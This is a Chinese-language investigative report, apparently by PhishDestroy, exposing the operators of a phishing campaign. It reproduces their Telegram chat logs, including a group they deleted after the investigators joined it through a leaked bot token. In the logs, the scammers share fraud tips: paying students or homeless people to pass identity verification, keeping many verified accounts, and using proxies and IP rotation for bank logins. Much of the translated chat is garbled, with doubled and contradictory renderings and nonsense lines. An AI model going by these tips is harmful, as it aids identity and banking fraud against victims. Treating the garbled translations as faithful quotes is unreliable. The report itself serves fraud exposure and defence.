博尼亚2025-03-03 14:59
好东西可遇不可求。很难找到好的掉落物
B
博尼亚2025-03-03 14:58
还是说有1.0版本?或者 1.0 已经有了
B
博尼亚2025-03-03 14:58
这里只有2.0个钓鱼网站。这里还有额定电流为2.0的保险丝
B
博尼亚2025-03-03 14:58
或者说,1.0 总比 2.0 好。嗯,反正1.0总比2.0好
B
博尼亚2025-03-03 14:57
与猛犸象与猛犸象
B
博尼亚2025-03-03 14:57
2.0 不会在闲着瞎混的时候发挥作用。2.0 坐着闲聊可不行
B
博尼亚2025-03-03 14:57
我更擅长处理交通事务。就流量而言,我已经不是第一了
B
博尼亚2025-03-03 14:57
这是Roo创作的《X's》这是手上的叉号
B
博尼亚2025-03-03 14:56
但这并不是广告团队但这并不是广告团队
B
博尼亚2025-03-03 14:56
确实有。我认识一个这样的人。(有人在做)我有熟人
B
博尼亚2025-03-03 14:56
不过,如果你知道怎么每天赚400-500的话,那就另当别论了。要是会的话,一天能赚400-500,这还算什么呢
B
博尼亚2025-03-03 14:55
“那又怎样呢?”)哎,那我这儿还忘了什么呢)
B
博尼亚2025-03-03 14:55
这里有一个指向手册的链接那里有一个指向手册的链接
B
博尼亚2025-03-03 14:54
这就是那样的双手就是这样的手会惹出麻烦
B
博尼亚2025-03-03 14:54
他他妈的流着口水,死死盯着,就为了得到他妈的一把。操,想让手动起来的话,可以流口水,眼睛还要瞪得大大的
B
博尼亚2025-03-03 14:54
呃,这有什么问题吗?这不就是同一个vork嘛。那好吧,这有什么问题呢?不也是同样的操作嘛
B
博尼亚2025-03-03 14:53
到达该区域需要一个月的时间一个月内就能抵达该区域
B
博尼亚2025-03-03 14:53
而且也没地方可去。如果你有点脑子,自然会明白的。如果没有,那就滚出去。是啊,这也没什么好说的,有脑子就能搞明白,没脑子的话,这儿也没什么可做的。
B
博尼亚2025-03-03 14:53
你想要什么?你到底想干什么
B
博尼亚2025-03-03 14:53
广告广告
B
博尼亚2025-03-03 14:52
我在这儿待了两天,发现2.0版没什么意思。我原本还觉得它挺酷的。我在这儿待了两天,对2.0没兴趣,我还以为挺有意思的呢
B
博尼亚2025-03-03 14:52
再来一份猛犸象吧还要养一头猛犸象
B
博尼亚2025-03-03 14:52
动动脑筋,想想该说什么。得好好想想该怎么回答
B
博尼亚2025-03-03 14:52
没有什么秘密这里没什么秘密
B
博尼亚2025-03-03 14:52
他会给你什么它能给你们什么
B
博尼亚2025-03-03 14:52
哎,如果说明书里写的全是同样的内容,那还有什么意义呢。话说,如果说明书里都有那些信息的话,那还有什么意义呢?
B
博尼亚2025-03-03 14:51
他会有时间回复你们这些混蛋的我们怎么可能有时间回复你们所有人呢
B
博尼亚2025-03-03 14:51
这训练真够呛。什么样的修行
B
博尼亚2025-03-03 14:51
他那里有100个人。哎呀,他那边每处都有100人
B
博尼亚2025-03-03 14:51
你为什么不给我点钱,我就把夹具的说明书给你。要不你们给我发点钱,我就把操作指南发给你们,就当回礼吧
B
博尼亚2025-03-03 14:50
在修复时在固定处
B
博尼亚2025-03-03 14:50
你不需要一本手册来教你这一切。你们都去学什么啊,说明书里都有了
B
博尼亚2025-03-03 14:50
2.0 就是这样。2.0 过去是怎样的,现在依然是怎样的
B
博尼亚2025-03-03 14:50
这他妈到底是怎么回事?这算什么题啊
B
博尼亚2025-03-03 14:48
是你自己点燃的吗?你自己已经开始了吗?
B
博尼亚2025-03-03 14:48
不是“咕咕”完全不行
B
博尼亚2025-03-03 14:48
lk 遭到了攻击在LK里有人被杀了
B
博尼亚2025-03-03 14:48
lk上到底在搞什么名堂《卡科伊·沃克》的LC版
B
博尼亚2025-03-03 14:48
你们这群混蛋,用你们的话说,你们到底是哪一个?这些他妈的是从谁那儿来的,你刚才怎么说的?
B
博尼亚2025-03-03 14:47
我不明白你在这里想表达什么。这里我没听懂你说什么
B
博尼亚2025-03-03 14:46
如果他们已经登录了,那就太好了。如果进入个人中心,那就ZBS
B
博尼亚2025-03-03 14:46
那么,他们登录了吗?那大家会进个人主页吗?
B
博尼亚2025-03-03 14:45
我不知道他们是怎么拍的。我搞不懂他们是怎么拍的
B
博尼亚2025-03-03 14:45
这些狗狗该报废了吗?要注销吗?
B
博尼亚2025-03-03 14:45
操,这他妈的还有个按钮那还搞什么“普希塔帕特”啊
B
博尼亚2025-03-03 14:42
我正自己倒呢我自己倒的
B
博尼亚2025-03-03 14:42
我他妈的才意识到,这根本不是给那些混蛋准备的。我他妈的明白那他妈不是什么鬼了
B
博尼亚2025-03-03 14:41
兄弟,这儿没东西能用这代币买,这是发薪日代币。兄弟,这里不卖任何鱼,这里是用来支付的鱼。
B
博尼亚2025-03-03 14:41
我懂了,没地方倒了我明白了,这里没法倒进去
B
博尼亚2025-03-03 14:40
应该是常规版 2.0,我猜。大概就是普通的2.0吧
B
博尼亚2025-03-03 14:40
这又不是在制造流量洪峰所以这里不会直接导流
-- Фбстор - 成功网站管理员聊天室! (23 条消息) --
B
博尼亚2025-02-26 07:51
好吧,随你那张破脸怎么搞就怎么搞吧。哎呀,管他谁的脸呢
B
博尼亚2025-02-26 07:50
一个男学生,200₽。给那个女学生200₽吧
B
博尼亚2025-02-26 07:50
这行得通行得通
B
博尼亚2025-02-26 07:50
你会发现街上有一位流浪汉。去街上抓个流浪汉来
B
博尼亚2025-02-26 07:50
所以,无论那是谁的脸,每个人都相信自己的脸。反正大家都在用自己的脸进行实名认证,管他谁的呢
B
博尼亚2025-02-26 07:50
打在你脸上。以自己的名义
B
博尼亚2025-02-26 07:49
但事实是,不管怎么说,我已经做过10次了。不过实际上,我大概有10个已验证账号
B
博尼亚2025-02-26 07:49
所以说,你这纯粹是在胡说八道。那你到底是在说些什么黑话啊
B
博尼亚2025-02-26 07:49
你可以可以
B
博尼亚2025-02-26 07:49
打在你脸上。以自己的名义
B
博尼亚2025-02-16 20:26
而不是通过某种训练把他们搞得一团糟,还让他们去处理交通。而不是像那种打着培训的名义,实际上却在利用他们来引流
B
博尼亚2025-02-16 20:25
像YouTube之类的普通网站。YouTube、TT、UBT等都是正常的
B
博尼亚2025-02-15 17:31
XzХз
B
博尼亚2025-02-15 17:31
以培训为借口以学习为借口
B
博尼亚2025-02-15 17:31
前往运河频道
B
博尼亚2025-02-15 17:31
这只是人们带来的交通流量而已。只是这些人的流量真多啊
B
博尼亚2025-02-15 17:31
所以那人说要订阅他所有的频道那家伙说要订阅他所有的频道
B
博尼亚2025-02-15 16:36
你不必写Huinyu建议:可以不写
B
博尼亚2025-02-06 15:11
如果你不懂倒酒的基本要领,那你就会……如果你连“如何浇铸”这样的基础知识都不懂,那你该怎么办呢?
B
博尼亚2025-02-06 15:11
有一个用于更改aipi的按钮,你至少应该去谷歌搜索一下。点击那个按钮就能更改IP地址,你自己去谷歌搜一下吧
B
博尼亚2025-02-06 15:10
🤨🤨
B
博尼亚2025-02-06 15:09
你可以通过旋转来更改其中的aipi。在那里可以更改IP的轮转顺序
B
博尼亚2025-02-06 15:09
为什么是1,因为是同一款手机为什么是1,这不就是移动设备吗
-- CryptoGrab - 互助聊天群(10条消息) --
B
博尼亚2025-02-06 15:31
事情没那么简单事情没那么简单
B
博尼亚2025-02-06 15:31
很简单。伊齐
B
博尼亚2025-01-23 20:30
没有一个例子不止一个例子
B
博尼亚2025-01-23 20:30
我在网上找不到任何关于AML检测的广告,这可一点也不好笑。真搞笑,我在网上居然完全没找到关于AML测试的广告
B
博尼亚2025-01-23 17:20
AML上根本什么都没有。AML上根本什么都没有
B
博尼亚2025-01-23 17:20
我在Facebook上试用了AML,发现它不仅能帮助摆脱美国,而且非常实用,甚至连网上找不到的旧软件包也能找到。我试着在脸书上发帖,想找找关于美国的可靠信息,但在网上连一些靠谱的、甚至较早的资源都没找到。
B
博尼亚2025-01-23 17:19
那么,你打算提出什么样的提议呢?话说回来,你打算提出什么样的报价呢?
B
博尼亚2025-01-23 17:16
你用 aml 吗?你会玩AML吗?
B
博尼亚2025-01-21 20:38
任何从事FB浇注工作的人都希望澄清几个问题有人在Facebook上发帖吗?我想请教几个问题
B
博尼亚2025-01-20 11:08
有没有人能提供一些关于AML的CREOS示例?有人有AML的创意案例吗?
-- 劳力士 | 公共聊天室 (28 条消息) --
B
博尼亚2024-09-11 15:29
立陶宛队正在哪个球场比赛?立陶宛在哪个平台上被痛击了
B
博尼亚2024-09-11 15:21
你是在搞那颗螺丝吗?你他妈的在搞什么鬼?
B
博尼亚2024-09-11 15:20
只是这些网站限制太多,搞起来特别麻烦只是这些平台对工作限制太大了,而且用起来真是他妈的麻烦
B
博尼亚2024-09-11 15:19
我脑子里已经有个主题了。如果他们能做到,那绝对会他妈的太棒了。我在那儿想了个点子,刚写了下来,如果能实现的话,那简直太棒了
B
博尼亚2024-09-11 15:19
我在这片农庄里没看到多少原木。我没怎么看到芬克的标志
B
博尼亚2024-09-11 15:19
这些演出场地的状况简直一团糟。哎呀,那些家伙在那儿搞些乱七八糟的事,所有场地都乱套了
B
博尼亚2024-09-11 15:16
我就是这个意思,这简直是“渡口上的渡口”。我不是一直在说吗,这简直是欺诈中的欺诈
B
博尼亚2024-09-11 15:15
我实在不明白现在情况到底好在哪里,我看到芬兰所有人都没在工作。我完全搞不懂现在哪边运行得更好,我看到大家在芬兰那边似乎都有点问题
B
博尼亚2024-09-11 15:08
嗯,如果你能碰上合适的代理,那成功率大概五五开吧。嗯,五五开吧,如果能碰上好代理的话
B
博尼亚2024-09-11 15:07
不过,你得明白,现在,只要使用豪华代理,哪怕是在Viber上,一登录,系统就会出问题。不过你要明白,现在用豪华代理的话,就连登录Viber时都会被检测到。
B
博尼亚2024-09-11 15:07
嗯,关于欧盟的罐装产品,我不太清楚。嘛,我对欧盟的银行不太了解
B
博尼亚2024-09-11 15:07
在 lk 中在个人中心
B
博尼亚2024-09-11 15:06
以前,熟食店里有10间步入式冷藏室以前,10次涂装的漆层能保持得更好
B
博尼亚2024-09-11 15:06
嗯,922也以1的比分领先并保持着优势。嗯,922也是1个进去就守住了
B
博尼亚2024-09-11 15:05
即使在去过三次之后,私下里谈论这件事也会让他们感到害怕。即使在三次尝试后,私信也会被他们屏蔽
B
博尼亚2024-09-11 15:05
如果1个代理对应1-2家银行如果1个代理对应1-2个银行,那么电流
B
博尼亚2024-09-11 15:05
这要看是哪家银行了这得看是哪家银行了
B
博尼亚2024-09-11 15:04
在拉克谢里胡说八道中,这些代理人往往脏兮兮的在拉克斯赫里·胡尼亚,代理服务器通常很脏
B
博尼亚2024-09-11 08:44
它在睡觉吗?那家伙在睡觉吗?
B
博尼亚2024-09-11 08:40
哦,这主意真不错。关于ZBS,我想到一个主意
B
博尼亚2024-09-11 08:40
那里没有像跳蚤市场之类的地方吗?他们那儿怎么就没有那种到处摆摊的跳蚤市场呢?
B
博尼亚2024-09-11 08:40
搞砸了Хуево
B
博尼亚2024-09-11 08:39
比利亚比利亚
B
博尼亚2024-09-11 08:39
有聊天室吗?那里有聊天室吗?
B
博尼亚2024-09-11 08:38
有人知道吗有人知道吗
B
博尼亚2024-09-11 08:38
芬卡的人用TG吗?在芬克,大家用TG吗?
B
博尼亚2024-09-10 12:14
谢谢。谢谢
B
博尼亚2024-09-10 12:13
芬兰现在几点了?现在去芬克看看吧
-- 热点/认证/赚钱💃🛍 (37 条消息) --
B
博尼亚2024-06-16 17:17
我没看到有谁在为她据理力争我没看到这里有谁是她的铁杆拥护者
B
博尼亚2024-06-16 17:17
总之,情况已经说清楚了,接下来大家各自做出自己的选择,而只有管理员帕夏在为她辩护这一点,已经说明了很多问题。好吧,我已经把情况都讲清楚了,接下来大家自己做决定吧。至于只有管理员帕夏在为她辩护这一点,已经说明了很多问题。
B
博尼亚2024-06-16 17:15
而且她又没付钱她又没付钱了
B
博尼亚2024-06-16 17:15
不,是她把钱转给了我们,但后来我们没有那个主要账户来转账,所以作为最后的手段,我们给维卡写了信。不,是她把这事推给了我们,但当时我们没有主要的转账渠道来汇款,所以作为最后的手段,我们给维基发了消息。
B
博尼亚2024-06-16 17:14
起初我们也还好,但最近你的钱总是莫名其妙地消失。起初我们这边一切也都很正常,但最近你们那边的钱总是莫名其妙地消失
B
博尼亚2024-06-16 17:14
我在发垃圾信息吗?我只是坐在这里告诉大家真相。你可以把它删掉。让大家知道你是怎么工作的。我这是在发垃圾信息吗?我只是坐在这里向大家讲述真相,你可以把这帖子删掉,但这又能改变什么呢?让人们知道你们是怎么工作的吧。
B
博尼亚2024-06-16 17:13
当你拥有其中一个时当您遇到这种情况时
B
博尼亚2024-06-16 17:13
所以,现在是时候让你反思一下了所以,是时候让你们好好思考一下了
B
博尼亚2024-06-16 17:13
我们与nei的合作也已持续很久,这是第二次出现这种情况了我们和她也合作很久了,这已经是第二次发生这种情况了
B
博尼亚2024-06-16 17:13
然后她记录下了这些数据,并说:“你知道这怎么运作的。”她记下了GS,并说你们知道它是怎么运作的
B
博尼亚2024-06-16 17:13
这事儿就是这么回事,咱们从头说起吧:我们拿了她的银行卡存了钱,存了6万,她去取钱时却发现钱没到账,因为ATM机把卡吞了,就这样,我们白白损失了6万。就是这事,这样吧,我们从头说起:我们先从她那里拿了一张银行卡,往里存了60k,她去取钱时却说拿不到钱,说是自动取款机把卡吞了,就这样,我们那60k就白花了。
B
博尼亚2024-06-16 17:11
她并不是那个掌控我们的人难道不是我们去她那里吗
B
博尼亚2024-06-16 17:11
虽然我们确实被盗了6万虽然我们被偷了60k
B
博尼亚2024-06-16 17:11
正常?我们在这里已经解释得一清二楚了。你这是在说我们是白痴。正常?我们已经把一切都解释清楚了,你们却说我们是白痴
B
博尼亚2024-06-16 17:10
你在为她辩护你们在保护她
B
博尼亚2024-06-16 17:10
她还拿着我们的钱我们的钱都留在她那儿了
B
博尼亚2024-06-16 17:10
所有这些全部
B
博尼亚2024-06-16 17:10
她说,虽然那人给了6万,但她表示没钱。有人给他转了6万,他说这钱拿不到了
B
博尼亚2024-06-16 17:10
描述*描述了*
B
博尼亚2024-06-16 17:10
整个情况已经向你说明了已经向你详细描述了整个情况
B
博尼亚2024-06-16 17:09
到底是谁搞的鬼?是她还是我们?Simplified Chinese (Mainland)到底是谁在搞鬼,是她还是我们?
B
博尼亚2024-06-16 17:09
我们银行里有6万。钱在哪儿?充了6万,钱去哪儿了
B
博尼亚2024-06-16 17:09
情况已经向你解释清楚了,无论你是哪种性别都无所谓。不管是什么样的女人,只要能把整个情况解释清楚给你听,性别完全不重要
B
博尼亚2024-06-16 17:08
取走6万,今天就到此为止吧。赚6万,然后算了
B
博尼亚2024-06-16 17:08
或者在合理范围内去你妈的。或者你们他妈的在合理范围内算什么
B
博尼亚2024-06-16 17:08
人们无力支付人们靠什么来支付呢
B
博尼亚2024-06-16 17:08
他还说卡片被卡机卡坏了,而且他没钱了。他说卡被卡住了,没钱了
B
博尼亚2024-06-16 17:08
一个男人被塞了6万,她就去开枪了。有人给那人倒了60千,她就去拍了
B
博尼亚2024-06-16 17:07
所以你要把事实告诉我。那你就按事实来论证一下
B
博尼亚2024-06-16 17:07
那到底他妈该怪谁,到底是谁把我给出卖了?那到底他妈的是谁的错,谁是冤大头,是我吗?
B
博尼亚2024-06-16 17:07
没什么可说的吗?没什么可说的?
B
博尼亚2024-06-16 17:07
要不然我就没法输入那个该死的密码了。还是说他他妈的连个弯弯的“pin”都打不出来
B
博尼亚2024-06-16 17:06
ATM他妈的怎么会卡住卡片?他妈的,ATM机怎么会把卡吞进去啊
B
博尼亚2024-06-16 17:06
冤大头回吸
B
博尼亚2024-06-16 17:06
而你他妈的还在为她卖力。你们他妈的在这里为她刷分干什么
B
博尼亚2024-06-16 17:06
你们这群他妈的“天生好手”简直是一群他妈的白痴。有个他妈的女人坐在这里摆弄她的钱,结果她的卡被ATM机吞了。操,你们这群他妈的傻逼,你们那婊子坐在那儿,还他妈的以为自动取款机把她的卡卡住了
B
博尼亚2024-06-16 16:40
@kysia1987 别上当受骗,直接踢飞了,然后合并进了6万@kysia1987 这项目是骗局,给了一点分红就卷款跑路,6万没了

莫内蒂·埃斯科巴:《沉默的老板》

与Bonya的261条消息形成鲜明对比的是,MONETTI只有 10 条公开消息 ——全部都在一个帖子中,位于 TraFFeeQ 聊天 (黑色ADS/SEO流量套利),为同事辩护:

TraFFeeQ 聊天2025年12月
“一个人做好自己的工作,就能拿到报酬——还有什么好讨论的?”
人做自己的工作,为此拿到报酬,还有什么好讨论的呢)
将犯罪行为正常化,视为“只是一份工作”
TraFFeeQ 聊天2025年12月
“没必要跟你讨论什么”
跟你没什么好谈的
轻蔑的权威——老板心态,凌驾于讨论之上
TraFFeeQ 聊天2025年12月
“除了你之外,还有好多事要做呢!”
没有你,我也有事可做)
这意味着有多项需要他关注的并行操作

MONETTI的Telegram群组透露了更多信息: 美杜莎 Google Ads (黑帽PPC欺诈),一个 Deepfakes 频道 (用于欺诈的合成媒体),以及 万宝路聊天室 (私密,未知)。Telegram Premium 订阅、全天候服务以及“Есть предложение”(“有个提议”) 商业传记描绘了一位将网络犯罪视为全职事业的人。

莫内蒂·埃斯科巴:完整消息记录(10条消息)
MONETTI ESCOBAR (@monettiescobar) — 完整翻译的消息记录
-- TraFFeeQ 聊天室 | 流量套利 | 黑帽广告/SEO | (9 条消息) --
ME
莫内蒂·埃斯科巴2025-12-06 20:42
别管它!别管这个了!
ME
莫内蒂·埃斯科巴2025-12-06 20:42
一个男人在工作那个人正在做自己的工作
ME
莫内蒂·埃斯科巴2025-12-06 20:42
无攻击性绝无任何侵略行为
ME
莫内蒂·埃斯科巴2025-12-06 20:40
这一点也不用担心你也不用为此担心
ME
莫内蒂·埃斯科巴2025-12-06 20:39
跟他说说吧,兄弟。他做这事并没有被禁止。兄弟,跟他说说吧,没人禁止他这么做
ME
莫内蒂·埃斯科巴2025-12-06 20:39
(除了你之外,还有好多事可做!)除了你之外,还有别的事可做!)
ME
莫内蒂·埃斯科巴2025-12-06 20:39
跟你没什么好谈的跟你没什么好谈的
ME
莫内蒂·埃斯科巴2025-12-06 20:38
就在他的昵称旁边写着呢。不用点开,你一看就知道了。他的昵称旁边写着“别用‘你’来称呼我”,你读一读就知道了
ME
莫内蒂·埃斯科巴2025-12-06 20:38
那人做好自己的工作,因此获得报酬,(喜欢讨论)人做自己的工作,为此拿到报酬,喜欢的话就来讨论吧)
-- 梅杜莎 | Google Ads | 聊天 (1 条消息) --
ME
莫内蒂·埃斯科巴2025-09-23 18:07
😍😍
MONETTI ESCOBAR 的 Telegram 个人资料
截图 2 — MONETTI 的 Telegram 个人资料。
Bonya 的 Telegram 个人资料
截图 3 —— Bonya 的个人资料。请注意 DC2(阿姆斯特丹)。

第7节:恐慌室

在PhishDestroy通过该暴露的Telegram机器人访问运营者群组后,双方进行了如下对话。下方的聊天记录已翻译成英语,原文俄语部分以斜体保留。用于访问的身份信息已被遮盖。

操作员组 — “Idr 卡” — 完整聊天记录(61 条消息)
— REDACTED 通过泄露的机器人令牌加入 —
R
已删除25-03-2026 13:03:43
/start
ME
莫内蒂·埃斯科巴25-03-2026 13:06:53
?
ME
莫内蒂·埃斯科巴25-03-2026 13:07:03
B
博尼亚25-03-2026 13:07:14
XzХз
R
已删除25-03-2026 13:07:14
你好,请保存你的数据,请稍等片刻
ME
莫内蒂·埃斯科巴25-03-2026 13:07:24
操什么啊操什么啊
B
博尼亚25-03-2026 13:07:27
B
博尼亚25-03-2026 13:07:28
就是他到底是谁
ME
莫内蒂·埃斯科巴25-03-2026 13:07:42
嗯哼。啊哈哈
ME
莫内蒂·埃斯科巴25-03-2026 13:07:44
这他妈的是怎么回事?切·布尔
B
博尼亚25-03-2026 13:07:53
该机器人已被入侵机器人被黑了
B
博尼亚25-03-2026 13:08:16
我听说我们的防守一团糟。顺便说一句,有人跟我说我们这儿的安保简直他妈的太强了
B
博尼亚25-03-2026 13:08:22
嗯,有这样一种类型嘛,就是那种人吧
B
博尼亚25-03-2026 13:08:43
这就像通过钓鱼攻击来破解一个机器人一样。我们这儿的机器人通过鱼牌就能轻松搞定,简直就像敲指头一样简单
ME
莫内蒂·埃斯科巴25-03-2026 13:09:09
@devosus
ME
莫内蒂·埃斯科巴25-03-2026 13:09:21
[已删除]。[已删除]
ME
莫内蒂·埃斯科巴25-03-2026 13:09:24
那是谁这是谁
B
博尼亚25-03-2026 13:10:29
请查看您的个人资料。你看看你的个人资料
B
博尼亚25-03-2026 13:10:32
这是一个黑客这是一个黑客
B
博尼亚25-03-2026 13:10:35
字面意思就是这样。字面意思是
B
博尼亚25-03-2026 13:10:41
翻译了他所接收的信息翻译了他在这条频道里写的内容
B
博尼亚25-03-2026 13:10:55
[已删除——Bonya 复制并粘贴了来自举报其域名的频道中的消息,试图查明是谁举报了他们]
B
博尼亚25-03-2026 13:12:19
那么,呃。算了
B
博尼亚25-03-2026 13:12:23
我他妈的不知道那是谁。我他妈的不知道这是谁
B
博尼亚25-03-2026 13:12:25
但这并非长久之计但这可不是什么好事
B
博尼亚25-03-2026 13:12:47
@devosus 在我们被打得落花流水之前,先考虑一下防守吧。@devosus 想想怎么防守吧,不然我们就要被虐得屁滚尿流了
编者按:博尼亚预感到了。假设他是俄罗斯人,并认为诈骗乌克兰是“爱国”之举。那么印度尼西亚又该如何看待——一个 自2024年10月起成为金砖国家合作伙伴 (喀山峰会)?从盟友的公民那里行骗也算爱国吗?独联体地区的诈骗分子是“一视同仁”的窃贼,既没有智慧,也没有忠诚。请阅读我们其他调查报道,其中我们已记录了 起诉案件 对于类似的运算符——结局总是相同的。
ME
莫内蒂·埃斯科巴25-03-2026 13:12:49
是啊,我明白了。是啊,我看到了
ME
莫内蒂·埃斯科巴25-03-2026 13:12:55
去你妈的。你在胡说八道什么啊
B
博尼亚25-03-2026 13:13:09
嘛,被吸干也算不上什么刺激的事。不过,被合并了也没什么好开心的
ME
莫内蒂·埃斯科巴25-03-2026 13:13:13
他什么也不会做他什么也不会做
ME
莫内蒂·埃斯科巴25-03-2026 13:13:18
他打算怎么办?他会出卖什么?
D
德沃伊斯25-03-2026 13:13:26
它是什么这是什么
ME
莫内蒂·埃斯科巴25-03-2026 13:13:34
是啊,有个人加入了有人加入了
D
德沃伊斯25-03-2026 13:13:34
来自哪里从哪里
B
博尼亚25-03-2026 13:13:35
即使你曾用自己的IP地址登录过那个钓鱼网站几次,现在这也行不通了。就算从自己的IP地址登录Fish一两次,也已经没意思了
ME
莫内蒂·埃斯科巴25-03-2026 13:13:37
致全体成员加入小组
ME
莫内蒂·埃斯科巴25-03-2026 13:13:38
XzХз
D
德沃伊斯25-03-2026 13:13:39
当使用 interpol 时当国际刑警组织
D
德沃伊斯25-03-2026 13:13:41
其中к 哪种
ME
莫内蒂·埃斯科巴25-03-2026 13:13:44
这一首这一
B
博尼亚25-03-2026 13:13:46
我只是进来聊聊点击这里进入聊天室
B
博尼亚25-03-2026 13:13:49
他写道:写道:
ME
莫内蒂·埃斯科巴25-03-2026 13:13:56
.
B
博尼亚25-03-2026 13:13:57
你好,请保存你的数据,请稍等片刻
ME
莫内蒂·埃斯科巴25-03-2026 13:14:11
[分享的照片]
D
德沃伊斯25-03-2026 13:14:31
我以前见过他们。我以前见过这种的
B
博尼亚25-03-2026 13:14:44
哎,我们用ukr机器人也被抓到了。哎,我们还被乌克兰的机器人搞得够呛
B
博尼亚25-03-2026 13:14:55
你没在聊天室里发消息。刚才没在聊天室里发消息
B
博尼亚25-03-2026 13:14:57
你不是写过……吗?啊,不是,有人写过
ME
莫内蒂·埃斯科巴25-03-2026 13:15:04
我才他妈的不管呢。是啊,管他呢
B
博尼亚25-03-2026 13:15:06
代表该频道代表该频道
D
德沃伊斯25-03-2026 13:15:23
别他妈管那事了。算了,去他妈的
ME
莫内蒂·埃斯科巴25-03-2026 13:15:31
我要把这个小组拆了我要删除这个群组
B
博尼亚25-03-2026 13:15:35
+
D
德沃伊斯25-03-2026 13:15:35
— 群组已被群主删除 —

该群组在几分钟内就被删除了。博尼亚临别时的回应——“+”——以及德沃伊斯的确认“是的”,就说明了一切: 他们知道自己暴露了,唯一的办法就是销毁证据。 但那时,数据已经采集完毕。

请注意博尼亚这番耐人寻味的评论: “我们的乌克兰机器人也遭到了攻击” — 证实这两个项目(乌克兰和印度尼西亚)由同一支运营团队负责,而且这并非他们的基础设施首次遭到入侵。

第8节:这说明了什么

PhishDestroy 的工作原理

出现在 phishdestroy.io 会经过这条自动化 Pipeline。dopomogvoina[.]sbs 也不例外。

检测
静态分析
基础设施测绘
起源探索
OSINT
报告生成

调查时间线

2026年3月20日
域名 dopomogvoina[.]sbs 通过NiceNIC International注册
2026年3月21日
由 PhishDestroy 的自动化监控 Pipeline 检测到
2026年3月21日
全自动分析已完成:已绘制基础设施图谱、已对 JS 打包文件进行去混淆、已记录 WebSocket 协议
2026年3月22日
已识别源IP地址。在同一台服务器上发现了第二个网络钓鱼项目(“HealthCare ID”)
2026年3月22日
曝光 config.json 通过 Telegram Bot API 实现操作员身份识别
2026年3月23日
已向托管服务提供商、Cloudflare 及相关 CERT 提交了滥用报告
2026年3月25日
文章已发布。域名报告已在 PhishDestroy 上线

这究竟是如何做到的:PhishDestroy的机器人智能网络

本项调查完全由 自动化系统. PhishDestroy 的 Pipeline 不仅能检测钓鱼域名,还能渗透到这些域名背后的运营者基础设施中。

2,000+
Telegram 机器人被收集
有效
部分机器人仍受监控
自2024年以来
系列正在运行

当网络钓鱼工具包泄露Telegram机器人令牌时——就像这个工具包通过……所做的那样 config.json — 我们的系统会自动收集这些信息,映射操作员组,提取成员列表,并归档消息记录。 超过2,000个机器人 自2024年以来,这些数据一直通过这种方式收集。其中一些仍在运行,我们乐于实时观察罪犯的活动——因为结局早已注定。

即使是那些删除了账号或清空了群组的用户,也为时已晚。等他们惊慌失措时,我们早已掌握了一切——消息存档、个人资料、群组成员信息以及关联的机器人。 删除不会改变任何事情。 这些数据原本就存在,现在也存在于我们的数据库中。

《等我》——骗子版

这种情况并非个例——它恰恰体现了 NiceNIC 的系统性疏忽 我们决定将其作为“超级黑客”的例子来介绍。正如“Типичный Мошенник”正确指出的那样:黑客和诈骗者之间是有区别的—— 智能. 这些犯罪分子既不是黑客,也不聪明。

PhishDestroy 的系统会自动从数千个域名中收集此类证据——捕获僵尸程序、存档运营者通信记录、绘制基础设施图谱。这一具体案例实在太荒谬了,不得不公之于众。该网络钓鱼工具包属于通用型产品,运营安全(OPSEC)措施形同虚设,且运营者在被发现后几分钟内就因惊慌失措而删除了他们的群组。

我们正在构建一个系统,该系统将显示 直接在域名报告页面上验证运营商身份 ——从骗子到受害者,就像俄罗斯电视节目《Жди Меня》(《等我》)一样,只是角色互换了。该节目自2024年以来一直以封闭模式播出。许多运营者已被查明身份——包括那些已删除账号的人。我们正在决定最 有意思 呈现方式。敬请期待。

相关域名

我们的分析发现了一个第二个领域—— hlpforvpeople[.]sbs — 通过同一注册商注册,且基础设施模式一致。这两个域名均记录在我们的数据库中:

注册商违规:NiceNIC International

NiceNIC国际集团有限公司(香港)已收到 多份详细的虐待报告 来自 PhishDestroy 关于这两者的内容 dopomogvoina[.]sbs 以及 hlpforvpeople[.]sbs. 截至发稿时—— 首次报告后的第5天 — 尚未采取任何措施。这两个域名仍可正常使用。

这并非个别案例。NiceNIC 是我们在调查中反复遇到的问题。该注册商的滥用举报联系方式(abuse@nicenic.net) 始终对证据确凿的网络钓鱼报告置之不理。尽管作为一家受 ICANN 认证的注册商,NICENIC 受《注册商认证协议》(RAA 第 3.18 条)约束,但其运营行为却似乎毫无顾忌。

NiceNIC 在俄罗斯市场开展业务,销售 .ru 该注册商以高价(约200美元)出售域名,并通过VK和Telegram——这两个在俄语用户群体中广受欢迎的平台——与客户沟通。其客户群体与地下社区存在重叠,这引发了严重质疑:该注册商对滥用报告置之不理,究竟是疏忽大意,还是蓄意的商业策略。

该调查报告的部分内容已发表 由于NiceNIC长期未采取行动. 当注册管理机构拒绝就网络钓鱼滥用行为采取行动时,公开曝光便成为唯一剩下的问责机制。

要点总结

  • 自动化是跟上时代步伐的唯一途径。 网络钓鱼工具包可在数小时内部署并转化为攻击武器。人工审查无法跟上这种速度。
  • 操作员也会犯错。 一个辅助项目中暴露的配置文件,揭露了一起涉及多个国家的网络钓鱼行动。要在每个项目中都保持完美的行动安全(OPSEC)实属不易。
  • 社会工程学随着新闻周期的变化而不断演变。 战争、人道主义援助和政府项目正越来越多地被用作网络钓鱼的诱饵,因为这些手段针对的是身处困境、较少质疑其合法性的群体。
  • 基础设施的复用已成为常态。 一台服务器、两个网络钓鱼项目、两个国家,但操作者相同。梳理基础设施之间的关联,所揭示的信息远比孤立地分析单个域名要多得多。

相关研究

来自 PhishDestroy 自动化情报 Pipeline 的更多调查结果

TrustWallet 控制面板遭曝光
管理面板遭入侵,揭露了一起涉及多国的加密货币网络钓鱼行动,并曝光了运营者的聊天记录。
加密货币盗币网络曝光
解析针对DeFi用户的、能清空钱包的钓鱼工具包背后的基础设施。
NiceNIC:助长网络犯罪的域名注册商
一家经ICANN认证的注册商如何一再无视滥用报告——包括针对此次调查的报告。
xmrwallet 丑闻曝光:10年来密钥遭窃
一项持续十年的门罗币钱包诈骗案,通过JavaScript分析和域名取证被揭露。
诈骗基础设施曝光
共享主机、共享运营商——网络钓鱼团伙如何在不同攻击活动中重复利用基础设施。
BuyTRX Drainer 内幕曝光
一种基于TRON的能源诈骗,通过恶意智能合约授权掏空用户的钱包。

免责声明: 本次调查完全通过被动侦察和公开API进行。未对任何系统进行未经授权的访问。Telegram机器人API调用使用了一个由运营者在无需身份验证的端点中公开暴露的令牌。根据信息安全领域的标准惯例,本文中所有域名均已进行匿名处理。

分享此调查

X / Twitter Telegram Reddit 领英

相关调查

加密货币钓鱼攻击剖析:8款真实种子短语窃取工具的逆向工程分析
深度调查
